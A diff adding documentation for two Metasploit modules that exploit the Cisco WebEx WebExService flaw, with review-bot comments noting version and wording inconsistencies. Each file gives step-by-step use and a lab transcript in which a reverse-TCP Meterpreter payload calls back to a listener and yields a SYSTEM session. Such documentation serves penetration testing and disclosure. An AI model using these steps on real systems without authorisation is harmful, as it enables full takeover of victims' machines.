Land #10864, Add Cisco WebEx RCE Modules
@@ -0,0 +1,62 @@
|
||||
## Description
|
||||
|
||||
This module gets an elevated session with System privileges by exploiting a remote code execution vulnerability found
|
||||
in Cisco's WebEx client software for versions below v33.6.0.655.
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
Cisco WebEx v33.3.8.7 and below
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Install the application
|
||||
2. Start msfconsole
|
||||
3. Get a session
|
||||
4. Do: ```use exploit/windows/local/webexec```
|
||||
5. Do: ```set SESSION <session>```
|
||||
6. Do: ```run```
|
||||
7. You should get an elevated session.
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Tested on Cisco WebEx v33.3.8.7 on Windows 7 x64 and x86
|
||||
|
||||
```
|
||||
|
||||
msf5 > use multi/handler
|
||||
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
|
||||
payload => windows/meterpreter/reverse_tcp
|
||||
msf5 exploit(multi/handler) > set lhost 192.168.37.1
|
||||
lhost => 192.168.37.1
|
||||
msf5 exploit(multi/handler) > run
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.37.1:4444
|
||||
[*] Sending stage (179779 bytes) to 192.168.37.136
|
||||
[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.136:49161) at 2018-10-24 09:41:47 -0500
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: WIN-MGMN7ND70I1\a_user
|
||||
meterpreter > background
|
||||
[*] Backgrounding session 1...
|
||||
msf5 exploit(multi/handler) > use exploit/windows/local/webexec
|
||||
msf5 exploit(windows/local/webexec) > set session 1
|
||||
session => 1
|
||||
msf5 exploit(windows/local/webexec) > set payload windows/meterpreter/reverse_tcp
|
||||
payload => windows/meterpreter/reverse_tcp
|
||||
msf5 exploit(windows/local/webexec) > set lhost 192.168.37.1
|
||||
lhost => 192.168.37.1
|
||||
msf5 exploit(windows/local/webexec) > run
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.37.1:4444
|
||||
[*] Checking service exists...
|
||||
[*] Writing 73802 bytes to %SystemRoot%\Temp\Ak4U78kG.exe...
|
||||
[*] Launching service...
|
||||
[*] Sending stage (179779 bytes) to 192.168.37.136
|
||||
[*] Meterpreter session 2 opened (192.168.37.1:4444 -> 192.168.37.136:49162) at 2018-10-24 09:42:35 -0500
|
||||
[*] Service started...
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: NT AUTHORITY\SYSTEM
|
||||
meterpreter >
|
||||
|
||||
```
|
||||
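Review bot: The version bounds in this file disagree: the Description says the issue affects "versions below v33.6.0.655", while Vulnerable Application says "Cisco WebEx v33.3.8.7 and below". State one bound in both places, or say explicitly that v33.3.8.7 is only the version tested and v33.6.0.655 is the first fixed release. The Description also calls this a "remote code execution vulnerability", but the module path is exploit/windows/local/webexec and step 3 requires an existing session, so the text should describe it as a local privilege escalation through the service. Finally, the run output shows a payload written to %SystemRoot%\Temp\Ak4U78kG.exe; the document should say whether the module removes that file or whether the tester has to clean it up.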
@@ -0,0 +1,58 @@
|
||||
## Description
|
||||
|
||||
This module exploits a remote code execution vulnerability in Cisco's WebEx client software for versions < v33.6.0.655.
|
||||
|
||||
Vulnerable WebEx clients come with the `WebExService` that can execute arbitrary commands with System privileges.
|
||||
Due to insufficient checks on permissions, a local or domain user can start the `WebExService` through a remote connection
|
||||
and execute code.
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
Cisco WebEx software v33.3.8.7 and below
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Install the application
|
||||
2. Start msfconsole
|
||||
3. Do: ```use exploit/windows/smb/webexec```
|
||||
4. Do: ```set RHOSTS <IP>```
|
||||
5. Do: ```set SMBUser <USERNAME>```
|
||||
6. Do: ```set SMBPass <PASSWORD>```
|
||||
7. Do: ```run```
|
||||
8. You should get a shell.
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Tested on Cisco WebEx v33.3.8.7 on Windows 7 x64 and x86
|
||||
|
||||
```
|
||||
|
||||
msf5 > use exploit/windows/smb/webexec
|
||||
msf5 exploit(windows/smb/webexec) > set smbuser a_user
|
||||
smbuser => a_user
|
||||
msf5 exploit(windows/smb/webexec) > set smbpass password
|
||||
smbpass => password
|
||||
msf5 exploit(windows/smb/webexec) > set rhosts 192.168.37.136
|
||||
rhosts => 192.168.37.136
|
||||
msf5 exploit(windows/smb/webexec) > set payload windows/meterpreter/reverse_tcp
|
||||
payload => windows/meterpreter/reverse_tcp
|
||||
msf5 exploit(windows/smb/webexec) > set lhost 192.168.37.1
|
||||
lhost => 192.168.37.1
|
||||
msf5 exploit(windows/smb/webexec) > run
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.37.1:4444
|
||||
[*] 192.168.37.136:445 - Connecting to the server...
|
||||
[*] 192.168.37.136:445 - Authenticating to 192.168.37.136:445 as user 'a_user'...
|
||||
[*] 192.168.37.136:445 - Command Stager progress - 0.96% done (999/104435 bytes)
|
||||
[*] 192.168.37.136:445 - Command Stager progress - 1.91% done (1998/104435 bytes)
|
||||
...
|
||||
[*] 192.168.37.136:445 - Command Stager progress - 99.47% done (103880/104435 bytes)
|
||||
[*] 192.168.37.136:445 - Command Stager progress - 100.00% done (104435/104435 bytes)
|
||||
[*] Sending stage (179779 bytes) to 192.168.37.136
|
||||
[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.136:49158) at 2018-10-24 09:10:46 -0500
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: NT AUTHORITY\SYSTEM
|
||||
meterpreter >
|
||||
|
||||
```
|
||||
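Review bot: The same version mismatch appears here: the Description gives "versions < v33.6.0.655" and Vulnerable Application gives "v33.3.8.7 and below"; pick one bound or label v33.3.8.7 as the tested version. The Verification Steps also do not match the Scenarios transcript: the transcript sets a payload and lhost before run and ends in a Meterpreter session as NT AUTHORITY\SYSTEM, while step 8 only says "You should get a shell" and no step mentions the payload or handler address. Since the Description says a "local or domain user" can start the service, an Options section documenting SMBUser, SMBPass and how a domain account is supplied would make the steps reproducible, and it should state the expected privilege level of the resulting session.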